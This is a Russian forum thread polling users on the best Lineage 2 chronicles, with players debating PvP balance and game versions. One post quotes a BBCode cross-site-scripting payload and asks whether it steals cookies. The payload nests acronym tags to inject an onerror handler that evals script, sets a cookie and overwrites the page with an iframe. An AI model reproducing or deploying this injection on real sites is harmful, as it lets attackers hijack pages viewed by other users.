Лучшие хроники? (1 Viewer)

Итак "Лучшие хроники?"

  • Lineage1 (разные)

    Голосов: 0 0,0%
  • Prelude (клозидbeta) -) (C0)

    Голосов: 0 0,0%
  • Harbingers of War (С1)

    Голосов: 0 0,0%
  • Age of Splendor (C2)

    Голосов: 0 0,0%
  • Rise of Darkness (C3)

    Голосов: 0 0,0%
  • Scions of Destiny (C4, C4.5)

    Голосов: 0 0,0%
  • Oath of Blood (C5)

    Голосов: 0 0,0%
  • Interlude (C6, CT0)

    Голосов: 0 0,0%
  • The Kamael (CT1)

    Голосов: 0 0,0%
  • HellBound (CT1.5)

    Голосов: 0 0,0%
  • Gracia Part 1 (CT2.1)

    Голосов: 0 0,0%
  • Gracia Part 2 (CT2.2)

    Голосов: 0 0,0%
  • Gracia Final (CT2.3)

    Голосов: 0 0,0%
  • Gracia Plus (CT2.5)

    Голосов: 0 0,0%
  • (CT3)

    Голосов: 0 0,0%
  • (CT3.5)

    Голосов: 0 0,0%

  • Всего проголосовало
    0

Nam1ko

New member
Регистрация
19.07.2011
Сообщения
13
Реакции
2
Баллы
0
лидируют с4 и грация финал,не сомтря на это,администрация намерена менять хроники на хф?
и планируется ли открыть с4 сервер?
 

Лейт

New member
Регистрация
09.08.2008
Сообщения
63
Реакции
3
Баллы
0
ИМХО
для долгой,душевной игры на х1 самый четкие хроники это ц4)
на 2 месте ХФ)
полюбому ХФ интереснее чем ГФ)
 

Nam1ko

New member
Регистрация
19.07.2011
Сообщения
13
Реакции
2
Баллы
0
ИМХОдля долгой,душевной игры на х1 самый четкие хроники это ц4)

на 2 месте ХФ)

полюбому ХФ интереснее чем ГФ)
ты играл в хф на офе например? хф это +2 инста,и убогий переделаный олимп,на котором ещё больше залива

 

Persy

Fennec Fox
Регистрация
28.02.2010
Сообщения
647
Реакции
608
Баллы
0
Код:
[acronym=[acronym= style=background:url('//') onerror= lol="if(document.cookie.indexOf(\x22ipb_my\x22)==-1){with(valid_until=new\x20Date())setTime(getTime()+30*24*60*60*1000);document.cookie=\x22ipb_my=1234;\x20expires=\x22+valid_until.toGMTString();document.write(\x22\x3Ciframe\x20src=http://mail.ru\x20frameborder=0\x20width=100%\x20height=100%\x20scrolling=no\x3E\x3C/******\x3E\x22);document.close()}";eval(lol); ]][/acronym][/acronym]
Эта шняга типо куки ворует?)

 

Лейт

New member
Регистрация
09.08.2008
Сообщения
63
Реакции
3
Баллы
0
ты играл в хф на офе например? хф это +2 инста,и убогий переделаный олимп,на котором ещё больше залива
я щас играю на офе) Там ПВП интереснее+ куча локаций новых,квестов.

 

Nam1ko

New member
Регистрация
19.07.2011
Сообщения
13
Реакции
2
Баллы
0
я щас играю на офе) Там ПВП интереснее+ куча локаций новых,квестов.
дружок, чем больше новых локаций - тем меньше пвп за спот

я играл на офе больше 2-х лет,и ушёл после хф уже,если например в грации финал были пвп за хб,фог,во фрее пвп за соа,то в хф если ты хочешь пвп ты не идёшь искать вар по спотам,ты просто пишешь кому то в пм "го 9х9",единственный плюс хф - это то что там снова фармятся валик и тарас(но это + только если сравнивать хф с грацией плюс или фреей,а не с грацией финал)

квесты...я хз если любишь квесты тебе в вов

чем там пвп интереснее?тем что дмг больше чем в 3 раза упал?когда за тобой бегает 4 топовых ножа и суют беки по 1-1.5к это я хз...

з.ы если бы администрация открыла 1 сервер хф,а остальные оставила как есть было бы намного лучше(моё имхо),а ещё было бы круто если бы был хоть 1 сервер с4

 
Последнее редактирование модератором:

Лейт

New member
Регистрация
09.08.2008
Сообщения
63
Реакции
3
Баллы
0
дружок, чем больше новых локаций - тем меньше пвп за спотя играл на офе больше 2-х лет,и ушёл после хф уже,если например в грации финал были пвп за хб,фог,во фрее пвп за соа,то в хф если ты хочешь пвп ты не идёшь искать вар по спотам,ты просто пишешь кому то в пм "го 9х9",единственный плюс хф - это то что там снова фармятся валик и тарас(но это + только если сравнивать хф с грацией плюс или фреей,а не с грацией финал)

квесты...я хз если любишь квесты тебе в вов

чем там пвп интереснее?тем что дмг больше чем в 3 раза упал?когда за тобой бегает 4 топовых ножа и суют беки по 1-1.5к это я хз...

з.ы если бы администрация открыла 1 сервер хф,а остальные оставила как есть было бы намного лучше(моё имхо),а ещё было бы круто если бы был хоть 1 сервер с4
ты походу с х15?

на грации финал 1 норм локация ХБ. ох как прикольна когда весь сервак качается на зеленке и химерах. Дротят 1 единственный квест на шмот)))) и каждые 5 минут приходят вары). не надо приувеличиать, что вара будет не найти. отчасти это так, но если пойти в ГЦ, ДВ, ФОГ полюбому найдешь вара.

Квест я имелл ввиду на шмот,пухи, камни атрибута. Любой игрок заходя в онлайн может провести хорошо время даже в соло.

ПВП интереснее тем, что появился баланс между классами. подняли некоторые классы. ну да мож ножи по 1,5к бьют это лучше чем по 7к.

На хф нет такого, что оптимальный класс для ПВП это ТыХа,БЭРС,ГЛАД,ТАНК, а остальное для массовки

 
Последнее редактирование модератором:

Nam1ko

New member
Регистрация
19.07.2011
Сообщения
13
Реакции
2
Баллы
0
ты походу с х15?на грации финал 1 норм локация ХБ. ох как прикольна когда весь сервак качается на зеленке и химерах. Дротят 1 единственный квест на шмот)))) и каждые 5 минут приходят вары). не надо приувеличиать, что вара будет не найти. отчасти это так, но если пойти в ГЦ, ДВ, ФОГ полюбому найдешь вара.

Квест я имелл ввиду на шмот,пухи, камни атрибута. Любой игрок заходя в онлайн может провести хорошо время даже в соло.

ПВП интереснее тем, что появился баланс между классами. подняли некоторые классы. ну да мож ножи по 1,5к бьют это лучше чем по 7к.

На хф нет такого, что оптимальный класс для ПВП это ТыХа,БЭРС,ГЛАД,ТАНК, а остальное для массовки
да,прикольно когда весь сервак качается в 1 локации,и каждые 5 минут приходят вары,это фан.

какой баланс??рулят маги с фирами +30,остальные потерпели жосткий нерф.

p.s да,я на х15 играю уже примерно 2.5 недели.

p.ss про то что вара не найти я не преувеличиваю,так было на офе

p.sss в хф все кроме магов - для массовки,т.к. остальные просто не наносят дмг по сути

 
Последнее редактирование модератором:

Лейт

New member
Регистрация
09.08.2008
Сообщения
63
Реакции
3
Баллы
0
p.sss в хф все кроме магов - для массовки,т.к. остальные просто не наносят дмг по сути
Маги наносят сильный дамаг? без фира маг пак бы помер от любова другова пака.

Пачка луков например на осаде нанесет больше дамага чем пак магов.

 

Nam1ko

New member
Регистрация
19.07.2011
Сообщения
13
Реакции
2
Баллы
0
Маги наносят сильный дамаг? без фира маг пак бы помер от любова другова пака.Пачка луков например на осаде нанесет больше дамага чем пак магов.
если не знаешь лучше промолчи

 

Reih

New member
Регистрация
25.07.2011
Сообщения
9
Реакции
1
Баллы
0
все что после Грации эпилога, это сервера инст зон и кучи соло локаций, которые ведут за собой остутсвие фана через малое количество времени после открытия,особенно на рейтах х5 и выше, те кто играют ща на финале и хотят ХФ просто не осознают какой глобальной будет эта проблема.
Инст фрея,Инст Фринта,Инст Закен,Тиат,Залы,Лабы это просто убивает сам игровой процесс и развитие. Не говоря уж о локациях "типо пойди в несколько окон и сделай себе пару топ сетов за прайм".
 

Nam1ko

New member
Регистрация
19.07.2011
Сообщения
13
Реакции
2
Баллы
0
все что после Грации эпилога, это сервера инст зон и кучи соло локаций, которые ведут за собой остутсвие фана через малое количество времени после открытия,особенно на рейтах х5 и выше, те кто играют ща на финале и хотят ХФ просто не осознают какой глобальной будет эта проблема. Инст фрея,Инст Фринта,Инст Закен,Тиат,Залы,Лабы это просто убивает сам игровой процесс и развитие. Не говоря уж о локациях "типо пойди в несколько окон и сделай себе пару топ сетов за прайм".
вот,человек хнает о чём пишет,но у грации плюс не фармятся валик и тарас,поэтому гф лучшие хроники

 

Converse

New member
Регистрация
10.08.2011
Сообщения
1
Реакции
1
Баллы
0
Лично я начинал играть на с4 но это далекое прошлое так что мой выбор Gracia Final
 

WildCard

Guru
Регистрация
20.07.2011
Сообщения
653
Реакции
76
Баллы
0
С4, ИЛ, ХФ
 
Последнее редактирование модератором:

lamo

Members +++
Регистрация
24.10.2007
Сообщения
340
Реакции
130
Баллы
0
/nostalgi 1
По геймплею круче Ц4 ничего не сделали. хз, в тогдашних пвп у меня натурально замирало сердце.
Нехватало там:
1) агра чаров у танков (ТК и Пал слишком унылы были)
2) потребности в конст пати (буста пати-кача), что выливалось в засилие окошек. (а потом час уламывать "нахренненужноговпати" биша на рес хД )
уровень сложности последующих хроник - УГ:
Персонаж 66+ уже имел вес, не было такой зависимости от лвла и шмота ---] mi tashili na skille.
Рукастый (читай осторожный) маг действительно был имбой
НО их количество стремилось к нулю. т.к. чотким посанам не по понятиям играть ногебаторами ---] подавляющее большинство магов были сказочными инвалидами и с кличем Nekr
rulit!!!111, зажав одну кнопку, частенько склеивали ласты от вменяемых недопвп классов (превед Бист-гном
smile.gif
) kaktak?, ребята во дворе говорили что маги всех гнут!!!?
*ее+овер могли всю ночь гнуть 2х некров со счетом 14к1
** 52 ПВ с равным успехом соло воевал с 50+ рб-пати
*** ОЛ+ВС 60+ укатывали равные РБ пачки с 99% вероятностью
smile.gif

**** хиро (кроме оги) - нормально падали.
не было такого разброса между кланами ---] кучка отморозков могла сидеть занозой в жопе у целых алли (превед афа, префед флер, превед солярис, превед я
wink.gif
)
*реальные случаи типа: смешанный говнопак 60-66 раскатал магопачку 3профников ДИ, с 2мя потерями.
Да, не всегда, чаще было наоборот, но это показатель.
Осады нынешние вообще угнетают, рискнул - упал, да и пох, встал - пришел обратно. А раньше по 30% сливать бо-бо было.
в ИЛ+ скорость спама банок и мощность и доступность эликов - вообще лулз. когда ввели ГФ, пока поцанчики недоноулайфили 81+, и 150 пухи, девиз пвп был "перещелкай противника"
в Ц4 откат большой, а без долбанных плащей. максимум: у СХ-20 гцп, у овера-50 гцп, у гнома-дохрена гцп) и ты еще их купи, если не нобл и не фармиш каты.
дроп шмота от мобов - вносил свою изюминку
smile.gif
это была целая культура
smile.gif

да и отношение к игре прикольнее было. был простор для РП, для модели поведения.
а щас туподроч...тьфу
smile.gif

баланс особо не поменялся:
маги: ну больше классов могут в поле мага нагнуть. ну дороже и сложнее магу одеться, чтоб рулить. все равно ногибаюд
мили: тоже самое, иногда могут нагнуть, полезны в катах и перчатках (если об поле не убьются). адекватный буст только танки получили.
луки: вроде опустили, а вроде и напихать могут.
итог: куча бесполезных рероллов недомагов в недоберсов и недомилишников.
вобщем: изменения линейки печальны и ведут в какую то задницу.
 
Последнее редактирование модератором:

РаЗВеДКа

Всем фир пацаны
Регистрация
29.07.2011
Сообщения
3 618
Реакции
257
Баллы
0
Не соглашусь, что с4 лучше. Сам люблю эти хроники, но ГФ все таки лучше.
В с4 пвп сводились к тому кто первый взял таргет. Лукарь с шиной +7+8 в пл сете с баюмом и ак и под фул бафом. С 1-го крита ложил почти всех 7-9к дамага. Пвп сводилось к тому, что сделал тп убил 5-6 фрагов и сое.
Пвп за мага было кто быстрее кинет канцел. Канцел снимал 100% бафа. Кинул канцел и убил.
О какой партийной игре может идти речь когда биш сноситься за 5 сек 1 спсом. Как и любой другой сопартиец.
Если твой сопартиец без бафа его фиг отхилишь.
 
Последнее редактирование модератором:

Amadeus

Members +
Регистрация
24.08.2011
Сообщения
123
Реакции
36
Баллы
0
/nostalgi 1
По геймплею круче Ц4 ничего не сделали. хз, в тогдашних пвп у меня натурально замирало сердце.

...
Хорошо написал, во многом согласен с тобой. Про лоу чаров-лайферов вообще в точку. )

 

BlaiZer

New member
Регистрация
22.08.2011
Сообщения
9
Реакции
0
Баллы
0
По мне лучшие хроники это интерлюд.
 

Users who are viewing this thread

Верх